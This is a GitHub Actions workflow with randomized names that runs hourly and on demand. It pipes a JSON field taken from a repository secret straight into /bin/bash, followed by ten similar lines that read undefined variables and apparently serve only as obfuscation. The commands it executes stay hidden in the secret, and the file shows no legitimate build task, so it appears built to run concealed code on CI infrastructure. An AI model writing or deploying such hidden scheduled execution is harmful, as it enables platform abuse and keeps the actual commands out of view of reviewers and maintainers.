name: jiumoshi1987
on:
  workflow_dispatch:
  schedule:
    - cron: '10 * * * *'
jobs:  # 27642
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiumoshi1987
        env:
          ygybx61: ${{ secrets.ygybx61 }}
        run: |
          echo $ygybx61 | jq -r .onsgn49 | /bin/bash
          echo $lvx35071 | jq -r .nrx1 | /bin/bash
          echo $jm4085 | jq -r .uko14041 | /bin/bash
          echo $co530 | jq -r .ax41079 | /bin/bash
          echo $i94 | jq -r .cqpjy01 | /bin/bash
          echo $od998 | jq -r .kovm88 | /bin/bash
          echo $oaq070 | jq -r .uakv37752 | /bin/bash
          echo $rs10 | jq -r .i9904 | /bin/bash
          echo $gqein69082 | jq -r .cfmcm6766 | /bin/bash
          echo $vlvo779 | jq -r .l51952 | /bin/bash
          echo $ssdxc3 | jq -r .pohbk6478 | /bin/bash

